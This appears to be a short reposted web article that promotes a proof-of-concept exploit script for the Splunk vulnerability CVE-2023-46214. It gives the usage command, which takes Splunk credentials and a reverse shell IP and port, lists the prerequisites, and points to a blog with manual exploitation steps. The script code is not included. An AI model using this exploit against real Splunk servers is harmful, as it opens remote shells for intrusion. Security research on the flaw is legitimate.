This article delves into a critical vulnerability in Splunk, identified as CVE-2023-46214. It provides a detailed analysis and a Proof of Concept (PoC) script to demonstrate the vulnerability’s exploitation. The script is designed for educational purposes, helping to understand the security implications of this vulnerability in Splunk, a popular data processing and analytics platform. The article emphasizes responsible usage, strictly for research and educational purposes, highlighting the potential risks and the necessary precautions to mitigate unauthorized access or misuse.

Usage

The Splunk instance URL, username, password, reverse shell IP, and port are all required as command-line parameters. For example:

$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

Prerequisites

  • Splunk credentials with upload permission to adddatamethods
    • Note: another vector might be possible, this is just what I used
  • Splunk is not running on SHC mode

Analysis

I’ve written a blog post detailing the methodology taken to uncover this vulnerability. If you are running into any issues with the script, the blog could be helpful as it details the manual steps for exploitation.

Analysis of CVE-2023-46214 + PoC

Published by Tamil S

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Leave a comment

Your email address will not be published. Required fields are marked *